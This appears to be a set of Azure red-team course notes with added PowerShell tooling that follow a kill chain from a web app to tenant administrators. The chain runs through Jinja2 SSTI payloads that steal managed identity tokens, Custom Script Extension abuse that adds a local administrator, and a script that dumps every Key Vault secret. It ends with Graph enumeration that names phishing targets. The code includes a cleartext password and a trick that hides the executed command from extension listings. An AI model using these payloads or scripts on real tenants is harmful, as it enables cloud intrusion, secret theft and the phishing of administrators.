Kill Chain 2


Path_1

Objectives 11, 16, 20, 21

  • Azure VMs User Data Abuse
  • Azure VMs Custom Script Extension Abuse: with a role that grants Microsoft.Compute/virtualMachines/extensions/write, list the extensions already on the VM and then push a Custom Script Extension whose commandToExecute runs as SYSTEM on the VM (here: create a local user and add it to the local Administrators group)
Get-AzVMExtension -ResourceGroupName "Research" -VMName "infradminsrv"
Set-AzVMExtension -ResourceGroupName "Research" -ExtensionName "ExecCmd" -VMName "infradminsrv" -Location "Germany West Central" -Publisher Microsoft.Compute -ExtensionType CustomScriptExtension -TypeHandlerVersion 1.8 -SettingString '{"commandToExecute":"powershell net user studentx StudxPassword@123 /add /Y; net localgroup administrators studentx /add"}'
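The Custom Script Extension abuse above as a reusable function. This is an added example, not code from the page or the course: it assumes an existing Az PowerShell session whose principal can write extensions on the target VM, and the function name Invoke-CseCommand and the default extension name are illustrative. It adds two things the one-liner does not: it reuses an existing Custom Script Extension (a VM can only carry one instance of it, so a second name fails) and it puts commandToExecute in protectedSettings, which Get-AzVMExtension does not return, unlike the -SettingString variant. The extension write itself is still visible in the subscription Activity Log and in the handler logs on the VM.

```powershell
# Added example (not from the page): run a command on a VM through the Custom Script Extension.
# Assumes an Az PowerShell session with Microsoft.Compute/virtualMachines/extensions/write
# on the target VM. Function and default extension names are illustrative.
function Invoke-CseCommand {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$ResourceGroupName,
        [Parameter(Mandatory)][string]$VMName,
        [Parameter(Mandatory)][string]$Command,    # PowerShell that runs as SYSTEM on the VM
        [string]$ExtensionName = 'ExecCmd'         # hypothetical default name
    )

    $vm = Get-AzVM -ResourceGroupName $ResourceGroupName -Name $VMName

    # Only one Custom Script Extension instance may exist per VM: if one is already
    # deployed, update it under its existing name instead of adding a second one.
    $existing = Get-AzVMExtension -ResourceGroupName $ResourceGroupName -VMName $VMName -ErrorAction SilentlyContinue |
        Where-Object { $_.ExtensionType -eq 'CustomScriptExtension' } | Select-Object -First 1
    if ($existing) {
        Write-Verbose "Reusing existing Custom Script Extension '$($existing.Name)'"
        $ExtensionName = $existing.Name
    }

    # commandToExecute goes into protectedSettings: encrypted for the VM and not returned
    # by Get-AzVMExtension, whereas -SettingString leaves it readable to anyone who can list extensions.
    $protected = @{ commandToExecute = "powershell -NoProfile -ExecutionPolicy Bypass -Command `"$Command`"" } |
        ConvertTo-Json -Compress

    Set-AzVMExtension -ResourceGroupName $ResourceGroupName -VMName $VMName -ExtensionName $ExtensionName `
        -Location $vm.Location -Publisher 'Microsoft.Compute' -ExtensionType 'CustomScriptExtension' `
        -TypeHandlerVersion '1.8' -ProtectedSettingString $protected | Out-Null

    # The handler's status tells us whether the command actually ran on the VM.
    $ext = Get-AzVMExtension -ResourceGroupName $ResourceGroupName -VMName $VMName -Name $ExtensionName -Status
    [pscustomobject]@{
        Extension         = $ext.Name
        ProvisioningState = $ext.ProvisioningState
        Status            = ($ext.Statuses | ForEach-Object { "$($_.Code): $($_.Message)" }) -join '; '
    }
}

# Usage with the names from the page: add a local admin on infradminsrv.
Invoke-CseCommand -ResourceGroupName 'Research' -VMName 'infradminsrv' `
    -Command 'net user studentx StudxPassword@123 /add /Y; net localgroup administrators studentx /add' -Verbose
```

Re-running the function with a different command changes the protected settings, which makes the extension handler execute again; re-running with identical settings may not.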

Path (11, 16, 20, 21, 25)

  1. Abuse the SSTI in the web app to get code execution
  2. Use the obtained token with Az PowerShell to find all accessible resources
  3. To access the key vault, request a key vault access token (resource https://vault.azure.net) through the same RCE
  4. Request a new ARM access token via the app RCE and connect with Az PowerShell using both the ARM token and the key vault token
$token = 'eyJ0....'
$keyvaulttoken = 'eyJ0....'
Connect-AzAccount -AccessToken $token -AccountId 2e91a4fe-a0f2-46ee-8214-fa2ff6aa9abc -KeyVaultAccessToken $keyvaulttoken
  5. Check whether we can access the key vault and read any of its secrets
Get-AzKeyVault
Get-AzKeyVaultSecret -VaultName ResearchKeyVault
Get-AzKeyVaultSecret -VaultName ResearchKeyVault -Name Reader -AsPlainText
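Steps 4 and 5 above, with the check a practitioner wants before pasting harvested tokens into Connect-AzAccount. This is an added example, not code from the page: it assumes $armToken and $kvToken came from the managed identity endpoint via the SSTI, and the function names are illustrative. Each token is only accepted by the audience it was minted for (an ARM token is rejected by Key Vault and vice versa), and a stale ARM token is why step 4 asks for a new one, so the example decodes the JWT payload and checks aud and exp first, then dumps every readable secret in every visible vault.

```powershell
# Added example (not from the page): validate harvested tokens, then use them with Az PowerShell.
# Assumes the tokens were obtained through the SSTI as in steps 1-4. Function names are illustrative.
function ConvertFrom-JwtPayload {
    param([Parameter(Mandatory)][string]$Token)
    # A JWT is header.payload.signature, each base64url-encoded without padding.
    $b64 = $Token.Split('.')[1].Replace('-', '+').Replace('_', '/')
    switch ($b64.Length % 4) { 2 { $b64 += '==' } 3 { $b64 += '=' } }
    [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($b64)) | ConvertFrom-Json
}

function Test-TokenFor {
    param([Parameter(Mandatory)][string]$Token, [Parameter(Mandatory)][string]$Audience)
    $c   = ConvertFrom-JwtPayload $Token
    $exp = [DateTimeOffset]::FromUnixTimeSeconds([int64]$c.exp)
    # aud is sometimes issued with a trailing slash; compare without it.
    $ok  = ($c.aud.TrimEnd('/') -eq $Audience.TrimEnd('/')) -and ($exp -gt [DateTimeOffset]::UtcNow.AddMinutes(5))
    Write-Host ("aud={0} appid={1} oid={2} expires={3:u} usable={4}" -f $c.aud, $c.appid, $c.oid, $exp, $ok)
    return $ok
}

function Connect-WithHarvestedTokens {
    param(
        [Parameter(Mandatory)][string]$ArmToken,
        [Parameter(Mandatory)][string]$KeyVaultToken,
        [string]$AccountId   # GUID passed as -AccountId; defaults to the oid claim (assumption)
    )
    if (-not (Test-TokenFor $ArmToken 'https://management.azure.com')) {
        throw 'ARM token has the wrong audience or is expired: request a new one through the RCE'
    }
    if (-not (Test-TokenFor $KeyVaultToken 'https://vault.azure.net')) {
        throw 'Key Vault token has the wrong audience or is expired'
    }
    if (-not $AccountId) { $AccountId = (ConvertFrom-JwtPayload $ArmToken).oid }

    Connect-AzAccount -AccessToken $ArmToken -KeyVaultAccessToken $KeyVaultToken -AccountId $AccountId | Out-Null

    # Enumerate every vault the identity can list and read whatever secrets it is allowed to.
    foreach ($vault in Get-AzKeyVault) {
        foreach ($s in Get-AzKeyVaultSecret -VaultName $vault.VaultName) {
            [pscustomobject]@{
                Vault = $vault.VaultName
                Name  = $s.Name
                Value = Get-AzKeyVaultSecret -VaultName $vault.VaultName -Name $s.Name -AsPlainText
            }
        }
    }
}

$armToken = 'eyJ0...'   # paste the tokens returned by the SSTI payloads
$kvToken  = 'eyJ0...'
Connect-WithHarvestedTokens -ArmToken $armToken -KeyVaultToken $kvToken
```

If Get-AzKeyVault lists a vault but Get-AzKeyVaultSecret fails, the identity has ARM visibility of the vault resource but no data-plane permission (access policy or Key Vault RBAC role) on it; the audience check above does not cover that.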

6. Let's see what Azure resources the user Kathy has access to. Note that Kathy's access to the Azure portal through a web browser is blocked by a Conditional Access policy, so we authenticate with Az PowerShell instead:

$password = ConvertTo-SecureString 'Gaxu@6991TEST$#*!@#' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('[email protected]',$password)
Connect-AzAccount -Credential $creds
Get-AzResource

7. Let's enumerate role assignments on the VM 'jumpvm':

Get-AzRoleAssignment -Scope /subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resourceGroups/RESEARCH/providers/Microsoft.Compute/virtualMachines/jumpvm

8. So there is a group 'VM Admins' that has the Virtual Machine Command Executor role on the jumpvm VM. Let's look at what that role definition allows:

Get-AzRoleDefinition -Name "Virtual Machine Command Executor"

9. Let's get some information about the VM Admins group and its membership:

Get-AzADGroup -DisplayName 'VM Admins'
Get-AzADGroupMember -GroupDisplayName 'VM Admins' | select UserPrincipalName
  10. We will use the Graph API rather than Az PowerShell to get all the details of the user. The result shows that [email protected] is a member of an administrative unit 'Control Group'. First get a Graph token from the current Az session:
(Get-AzAccessToken -ResourceUrl https://graph.microsoft.com).Token

11. Let's get information and membership of this administrative unit using the AzureAD module. We are using Kathy's credentials below:

Import-Module C:\AzAD\Tools\AzureAD\AzureAD.psd1
Connect-AzureAD -Credential $creds
Get-AzureADMSAdministrativeUnit -Id e1e26d93-163e-42a2-a46e-1b7d52626395
Get-AzureADMSAdministrativeUnitMember -Id e1e26d93-163e-42a2-a46e-1b7d52626395

12. The VM Admins group is a member of the administrative unit. Let's check for any roles scoped to this administrative unit (the scoped role memberships show which principal holds which RoleId within the unit):

Get-AzureADMSScopedRoleMembership -Id e1e26d93-163e-42a2-a46e-1b7d52626395 | fl *
  13. Let's check the role using the RoleId we got above:
Get-AzureADDirectoryRole -ObjectId 5b3935ed-b52d-4080-8b05-3a1832194d3a
  14. Get some more details about the user Roy (the RoleMemberInfo from the previous step):
Get-AzureADUser -ObjectId 8c088359-66fb-4253-ad0d-a91b82fd548a | fl *
  15. Using the information collected from jumpvm about the user Roy, execute a phishing attack against him: Roy holds an authentication administrator role scoped to the administrative unit.

Find the right index of Popen

  • Whoami Command
{% for x in ().__class__.__mro__[1].__subclasses__() %}
 {% if "Popen" in x.__name__ %}
  {{x('whoami',shell=True,stdout=-1).communicate()}}
 {% endif %}
{% endfor %}
  • Request an ARM access token from the managed identity endpoint (uses the app's IDENTITY_ENDPOINT and IDENTITY_HEADER environment variables)
{% for x in ().__class__.__mro__[1].__subclasses__() %}
 {% if "Popen" in x.__name__ %}
  {{x('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&api-version=2017-09-01" -H secret:$IDENTITY_HEADER',shell=True,stdout=-1).communicate()}}
 {% endif %}
{% endfor %}
  • Request a key vault access token
{% for x in ().__class__.__mro__[1].__subclasses__() %}
 {% if "Popen" in x.__name__ %}
  {{x('curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&api-version=2017-09-01" -H secret:$IDENTITY_HEADER',shell=True,stdout=-1).communicate()}}
 {% endif %}
{% endfor %}
  • Request a new ARM access token
{% for x in ().__class__.__mro__[1].__subclasses__() %}
 {% if "Popen" in x.__name__ %}
  {{x('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&api-version=2017-09-01" -H secret:$IDENTITY_HEADER',shell=True,stdout=-1).communicate()}}
 {% endif %}
{% endfor %}

List All classes using MRO (Method Resolution Order)

{{''.__class__.__mro__[1].__subclasses__()}}
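The three token payloads above differ only in the resource value, and the interesting part of the response is the JSON inside the communicate() tuple. The following is an added example, not code from the page: it builds the same Popen-walking Jinja2 payload for any resource, sends it to a hypothetical vulnerable GET parameter ($Param on $Url, both assumptions to adapt to the real app), and extracts access_token from the rendered output. It HTML-decodes the body first, because a template with autoescaping on turns the quotes in the JSON into entities and a naive regex then misses the token.

```powershell
# Added example (not from the page): fetch managed-identity tokens through the SSTI.
# The target URL and parameter name are assumptions; the payload is the one used on the page.
function New-SstiTokenPayload {
    param([Parameter(Mandatory)][string]$Resource)
    # Same curl the page runs; $IDENTITY_ENDPOINT / $IDENTITY_HEADER are expanded by the app's shell.
    $cmd = "curl `"`$IDENTITY_ENDPOINT?resource=$Resource&api-version=2017-09-01`" -H secret:`$IDENTITY_HEADER"
    # Walk object's subclasses to find subprocess.Popen instead of hard-coding an index,
    # which changes between Python builds.
    "{% for x in ().__class__.__mro__[1].__subclasses__() %}{% if `"Popen`" in x.__name__ %}{{x('$cmd',shell=True,stdout=-1).communicate()}}{% endif %}{% endfor %}"
}

function Get-TokenViaSsti {
    param(
        [Parameter(Mandatory)][string]$Url,      # hypothetical vulnerable endpoint
        [Parameter(Mandatory)][string]$Param,    # hypothetical parameter rendered into the template
        [Parameter(Mandatory)][string]$Resource  # https://management.azure.com or https://vault.azure.net
    )
    $payload = New-SstiTokenPayload -Resource $Resource
    $resp = Invoke-WebRequest -Uri "$Url?$Param=$([uri]::EscapeDataString($payload))" -UseBasicParsing

    # communicate() renders as (b'{"access_token": "...", ...}', None); with autoescaping on,
    # the quotes come back as HTML entities, so decode before matching.
    $body = [System.Net.WebUtility]::HtmlDecode($resp.Content)
    if ($body -match 'access_token"\s*:\s*"([^"]+)"') { return $Matches[1] }
    throw "No access_token in response: check that the Popen match fired and that the app has a managed identity"
}

# Usage: one call per audience, as in the steps above.
$armToken = Get-TokenViaSsti -Url 'https://app.example/render' -Param 'name' -Resource 'https://management.azure.com'
$kvToken  = Get-TokenViaSsti -Url 'https://app.example/render' -Param 'name' -Resource 'https://vault.azure.net'
```

If the response shows the communicate() tuple but an error body instead of JSON, the IDENTITY_* variables are usually missing, which means the app has no managed identity assigned; the payload is still correct.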

Manual Graph API call to list the objects a user is a member of (groups and administrative units, e.g. 'Control Group')

$Token = 'eyJ0eX..'
$URI = 'https://graph.microsoft.com/v1.0/users/[email protected]/memberOf'
$RequestParams = @{
  Method = 'GET'
  Uri = $URI
  Headers = @{
    'Authorization' = "Bearer $Token"
    }
  }
(Invoke-RestMethod @RequestParams).value
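Steps 7 to 14 above and the manual memberOf call can be chained into one enumeration: start from a resource, follow group principals in its role assignments, find the administrative units those groups sit in, and list who holds roles scoped to each unit. This is an added example, not code from the page: it assumes an Az PowerShell session (Kathy's, for instance) with directory read access, uses only Graph v1.0 endpoints that exist (groups/{id}/members, groups/{id}/memberOf, directory/administrativeUnits/{id}/scopedRoleMembers, directoryRoles/{id}), and its function names are illustrative. It also handles two things the one-off calls do not: Graph paging via @odata.nextLink, and newer Az versions returning the access token as a SecureString.

```powershell
# Added example (not from the page): automate the jumpvm -> VM Admins -> Control Group -> Roy chain.
# Assumes an Az session with directory read access. Function names are illustrative.
function Get-GraphToken {
    $t = (Get-AzAccessToken -ResourceUrl 'https://graph.microsoft.com').Token
    # Newer Az versions return a SecureString here; older ones return a plain string.
    if ($t -is [securestring]) { $t = [System.Net.NetworkCredential]::new('', $t).Password }
    return $t
}

function Invoke-Graph {
    param([Parameter(Mandatory)][string]$Path, [Parameter(Mandatory)][string]$Token)
    $uri = "https://graph.microsoft.com/v1.0$Path"
    $out = @()
    while ($uri) {   # follow @odata.nextLink until the collection is exhausted
        $r = Invoke-RestMethod -Method GET -Uri $uri -Headers @{ Authorization = "Bearer $Token" }
        if ($null -ne $r.value) { $out += $r.value } else { $out += $r }   # collection vs single object
        $uri = $r.'@odata.nextLink'
    }
    return $out
}

function Find-ScopedAdminsReachableFrom {
    param([Parameter(Mandatory)][string]$Scope)   # ARM resource id, e.g. the jumpvm VM
    $token = Get-GraphToken

    # Steps 7/8: role assignments on the resource; follow the group principals.
    foreach ($ra in Get-AzRoleAssignment -Scope $Scope | Where-Object { $_.ObjectType -eq 'Group' }) {
        Write-Host "Group '$($ra.DisplayName)' has role '$($ra.RoleDefinitionName)' on $Scope"

        # Step 9: members of the group
        foreach ($m in Invoke-Graph "/groups/$($ra.ObjectId)/members" $token) {
            Write-Host "  member: $($m.userPrincipalName) ($($m.id))"
        }

        # Steps 10-12: administrative units the group belongs to, and roles scoped to them
        $aus = Invoke-Graph "/groups/$($ra.ObjectId)/memberOf" $token |
            Where-Object { $_.'@odata.type' -eq '#microsoft.graph.administrativeUnit' }
        foreach ($au in $aus) {
            Write-Host "  group is in administrative unit '$($au.displayName)' ($($au.id))"
            # Steps 13/14: scoped role members and the role each one holds
            foreach ($srm in Invoke-Graph "/directory/administrativeUnits/$($au.id)/scopedRoleMembers" $token) {
                $role = Invoke-Graph "/directoryRoles/$($srm.roleId)" $token
                [pscustomobject]@{
                    AdministrativeUnit = $au.displayName
                    Role               = $role.displayName
                    Principal          = $srm.roleMemberInfo.displayName
                    PrincipalId        = $srm.roleMemberInfo.id
                }
            }
        }
    }
}

# Usage with the scope from step 7:
Find-ScopedAdminsReachableFrom -Scope '/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resourceGroups/RESEARCH/providers/Microsoft.Compute/virtualMachines/jumpvm'
```

The objects emitted at the end are the phishing targets for step 15: each row is a principal whose directory role applies to the members of an administrative unit that our VM-admin group belongs to.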